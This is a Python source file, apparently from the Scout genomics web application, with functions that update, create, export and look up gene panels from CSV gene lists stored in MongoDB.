def update_panel(store, panel_name, csv_lines, option):
    """Update an existing gene panel with genes.

    Args:
        store(scout.adapter.MongoAdapter)
        panel_name(str)
        csv_lines(iterable(str)): Stream with genes
        option(str): 'add' or 'replace'

    Returns:
        panel_obj(dict)
    """
    new_genes = []
    panel_obj = store.gene_panel(panel_name)
    if panel_obj is None:
        return None

    # retroactively add hidden field
    if "hidden" not in panel_obj:
        panel_obj["hidden"] = False

    try:
        new_genes = parse_genes(csv_lines)  # a list of gene dictionaries containing gene info
    except SyntaxError as error:
        flash(error.args[0], "danger")
        return None

    # if existing genes are to be replaced by those in csv_lines
    if option == "replace":
        # all existing genes should be deleted
        for gene in panel_obj["genes"]:
            # create extra key to use in pending actions:
            gene["hgnc_symbol"] = gene["symbol"]
            store.add_pending(panel_obj, gene, action="delete", info=None)

    # PERF: hoisted out of the per-gene loop below -- the set of existing
    # ids does not change while pending actions are collected.
    existing_ids = (
        {gene["hgnc_id"] for gene in panel_obj["genes"]} if option != "replace" else set()
    )

    for new_gene in new_genes:
        if not new_gene["hgnc_id"]:
            flash("gene missing hgnc id: {}".format(new_gene["hgnc_symbol"]), "danger")
            continue
        gene_obj = store.hgnc_gene_caption(new_gene["hgnc_id"])
        if gene_obj is None:
            flash(
                "gene not found: {} - {}".format(new_gene["hgnc_id"], new_gene["hgnc_symbol"]),
                "danger",
            )
            continue
        if new_gene["hgnc_symbol"] and gene_obj["hgnc_symbol"] != new_gene["hgnc_symbol"]:
            flash(
                "symbol mis-match: {0} | {1}".format(
                    gene_obj["hgnc_symbol"], new_gene["hgnc_symbol"]
                ),
                "warning",
            )

        info_data = {
            "disease_associated_transcripts": new_gene["transcripts"],
            "reduced_penetrance": new_gene["reduced_penetrance"],
            "mosaicism": new_gene["mosaicism"],
            "inheritance_models": new_gene["inheritance_models"],
            "database_entry_version": new_gene["database_entry_version"],
        }
        if option == "replace":
            # there will be no existing genes for sure, because we're replacing them all
            action = "add"
        else:
            # add option: add if the gene is not existing, otherwise edit it
            action = "edit" if gene_obj["hgnc_id"] in existing_ids else "add"
        store.add_pending(panel_obj, gene_obj, action=action, info=info_data)

    return panel_obj


def new_panel(
    store,
    institute_id,
    panel_name,
    display_name,
    csv_lines,
    maintainer=None,
    description=None,
):
    """Create a new gene panel.

    Args:
        store(scout.adapter.MongoAdapter)
        institute_id(str)
        panel_name(str)
        display_name(str)
        csv_lines(iterable(str)): Stream with genes
        maintainer(list(user._id))
        description(str)

    Returns:
        panel_id: the ID of the new panel document created or None
    """
    institute_obj = store.institute(institute_id)
    if institute_obj is None:
        flash("{}: institute not found".format(institute_id))
        return None

    panel_obj = store.gene_panel(panel_name)
    if panel_obj:
        flash(
            "panel already exists: {} - {}".format(
                panel_obj["panel_name"], panel_obj["display_name"]
            ),
            "danger",
        )
        return None

    LOG.debug("parse genes from CSV input")
    try:
        new_genes = parse_genes(csv_lines)
    except SyntaxError as error:
        flash(error.args[0], "danger")
        LOG.debug("Ooops!")
        return None

    LOG.debug("build new gene panel")
    panel_id = None
    try:
        panel_data = build_panel(
            dict(
                panel_name=panel_name,
                institute=institute_obj["_id"],
                version=1.0,
                maintainer=maintainer,
                date=dt.datetime.now(),
                display_name=display_name,
                description=description,
                genes=new_genes,
                hidden=False,
            ),
            store,
        )
        panel_id = store.add_gene_panel(panel_data)
    except Exception as err:
        flash(str(err), "danger")

    return panel_id


def panel_export(store, panel_obj):
    """Preprocess a panel of genes."""
    panel_obj["institute"] = store.institute(panel_obj["institute"])
    full_name = "{}({})".format(panel_obj["display_name"], panel_obj["version"])
    panel_obj["name_and_version"] = full_name
    return dict(panel=panel_obj)


def get_panels(store, panel_name):
    """Fetch matching gene panels and return a list."""
    gene_panels = list(store.gene_panels(panel_id=panel_name, include_hidden=True))
    return gene_panels